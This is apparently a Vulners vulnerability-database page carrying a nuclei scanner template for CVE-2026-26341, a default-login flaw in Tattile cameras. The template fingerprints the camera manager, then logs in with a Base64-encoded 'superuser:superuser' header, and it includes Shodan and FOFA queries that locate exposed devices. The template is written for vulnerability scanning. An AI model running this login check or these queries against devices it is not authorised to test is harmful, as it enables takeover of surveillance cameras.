Lucene search
K

Tattile Camera < 1.181.5 - Default Login

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

Tattile devices with firmware up to 1.181.5 have default credentials, enabling management interface admin access.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-26341
24 Feb 202618:40
attackerkb
Circl
CVE-2026-26341
24 Feb 202622:11
circl
CNNVD
Tattile Smart+ 安全漏洞
24 Feb 202600:00
cnnvd
CVE
CVE-2026-26341
24 Feb 202618:40
cve
Cvelist
CVE-2026-26341 Tattile Smart+ / Vega / Basic <= 1.181.5 Default Credentials
24 Feb 202618:40
cvelist
NVD
CVE-2026-26341
24 Feb 202620:27
nvd
Packet Storm
📄 Tattile Cameras 1.181.5 Default Credentials
24 Feb 202600:00
packetstorm
Positive Technologies
PT-2026-21789
24 Feb 202600:00
ptsecurity
RedhatCVE
CVE-2026-26341
25 Feb 202622:16
redhatcve
Vulnrichment
CVE-2026-26341 Tattile Smart+ / Vega / Basic <= 1.181.5 Default Credentials
24 Feb 202618:40
vulnrichment
Rows per page
id: CVE-2026-26341

info:
  name: Tattile Camera < 1.181.5 - Default Login
  author: 0x_Akoko
  severity: high
  description: |
   Tattile Smart+, Vega, and Basic device families firmware <= 1.181.5 contain a broken authentication caused by default credentials not forced to be changed, letting attackers with management interface access gain administrative privileges.
  impact: |
   Attackers can gain administrative access to device configuration and data, leading to unauthorized control and data exposure.
  remediation: |
   Update firmware to a version later than 1.181.5 or the latest available version.
  reference:
    - https://www.cve.org/CVERecord?id=CVE-2026-26341
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
    cvss-score: 9.3
    cve-id: CVE-2026-26341
    epss-score: 0.02663
    epss-percentile: 0.83884
    cwe-id: CWE-1392
    cpe: cpe:2.3:o:tattile:smart\+_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.html:"Tattile camera manager"
    fofa-query: icon_hash=="2030104257"
  tags: cve,cve2026,tattile,default-login,camera,iot

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "Tattile camera manager")
        condition: and
        internal: true

  - raw:
      - |
        GET /api/v1/security/login HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic c3VwZXJ1c2VyOnN1cGVydXNlcg==

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, "text/plain")
          - regex("^[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}$", body)
        condition: and
# digest: 4b0a004830460221009a9d32115fdbfeda4c3b51f16ac5326a103e46f864855b036c2cbe320ccf650e022100e387e8a0e682bab4b0c516ca727d45a5400b9c0cdda3b17797cf3d958b0c6c48:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 May 2026 02:39Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.19.8
CVSS 49.3
EPSS0.02663
SSVC
17